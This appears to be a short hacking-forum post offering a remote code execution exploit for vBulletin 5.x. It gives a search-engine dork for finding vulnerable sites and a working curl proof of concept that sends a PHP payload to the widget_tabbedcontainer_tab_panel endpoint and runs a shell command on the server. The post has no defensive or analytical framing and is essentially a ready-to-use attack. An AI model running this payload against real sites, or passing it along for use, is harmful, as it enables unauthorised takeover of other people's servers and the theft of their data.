0day RCE exploit on vBulletin 5xx
dork
POC
dork
Код:
intext:"Powered by vBulletin"
POC
Код:
curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'